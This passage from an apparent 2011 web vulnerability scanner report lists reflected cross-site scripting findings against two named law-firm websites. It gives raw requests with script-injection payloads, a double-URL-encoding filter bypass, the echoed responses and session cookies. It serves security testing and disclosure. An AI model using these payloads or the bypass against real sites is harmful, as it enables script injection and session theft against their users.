Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Public_Policy/rss.xmlcc78d"><script>alert(1)</script>35e1d1edf9" value="">
...[SNIP]...

2.218. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202 was submitted in the REST URL parameter 1. This input was echoed as 8e1f4"><script>alert(1)</script>0a2d2f96202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202/practices/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss8e1f4"><script>alert(1)</script>0a2d2f96202/practices/White_Collar_Defense/rss.xml" value="">
...[SNIP]...

2.219. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4 was submitted in the REST URL parameter 2. This input was echoed as 68e4a"><script>alert(1)</script>dceb9945ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices68e4a"><script>alert(1)</script>dceb9945ee4/White_Collar_Defense/rss.xml" value="">
...[SNIP]...

2.220. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4 was submitted in the REST URL parameter 3. This input was echoed as 74b35"><script>alert(1)</script>3123ddbb2f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/White_Collar_Defense74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/White_Collar_Defense74b35"><script>alert(1)</script>3123ddbb2f4/rss.xml" value="">
...[SNIP]...

2.221. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 was submitted in the REST URL parameter 4. This input was echoed as b3f91"><script>alert(1)</script>069fcdb3970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/White_Collar_Defense/rss.xmlb3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/White_Collar_Defense/rss.xmlb3f91"><script>alert(1)</script>069fcdb3970" value="">
...[SNIP]...

2.222. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad was submitted in the REST URL parameter 1. This input was echoed as 85268"><script>alert(1)</script>8395fd2c6ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad/publications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss85268"><script>alert(1)</script>8395fd2c6ad/publications/rss.xml" value="">
...[SNIP]...

2.223. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518 was submitted in the REST URL parameter 2. This input was echoed as 438f3"><script>alert(1)</script>2ac3b841518 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/publications438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/publications438f3"><script>alert(1)</script>2ac3b841518/rss.xml" value="">
...[SNIP]...

2.224. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 was submitted in the REST URL parameter 3. This input was echoed as d7207"><script>alert(1)</script>5a1738ffeb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/publications/rss.xmld7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/publications/rss.xmld7207"><script>alert(1)</script>5a1738ffeb4" value="">
...[SNIP]...

2.225. http://www.wileyrein.com/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 was submitted in the REST URL parameter 1. This input was echoed as 53325"><script>alert(1)</script>5cfc2555b00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /x2253325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/x2253325"><script>alert(1)</script>5cfc2555b00" value="">
...[SNIP]...

2.226. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b894"><script>alert(1)</script>8dd0074b00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /x22?4b894"><script>alert(1)</script>8dd0074b00e=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/x22?4b894"><script>alert(1)</script>8dd0074b00e" value="1">
...[SNIP]...

2.227. http://www.arnoldporter.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56449"><a>3c0af12941a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18264165;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/
Set-Cookie: CFTOKEN=19385056;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a">
...[SNIP]...

2.228. http://www.arnoldporter.com/about_the_firm_diversity_our_values.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_diversity_our_values.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a813"><a>7b216e3e1ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_diversity_our_values.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad">
...[SNIP]...

2.229. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_pro_bono_our_commitment.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7be1"><a>6b37d6049c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6">
...[SNIP]...

2.230. http://www.arnoldporter.com/about_the_firm_recognition.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18dcd"><a>1951d83601 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_recognition.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601">
...[SNIP]...

2.231. http://www.arnoldporter.com/about_the_firm_recognition_rankings.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition_rankings.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e576"><a>6afa9807f84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_recognition_rankings.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84">
...[SNIP]...

2.232. http://www.arnoldporter.com/about_the_firm_who_we_are.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_who_we_are.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86c8"><a>12209855120 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_who_we_are.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
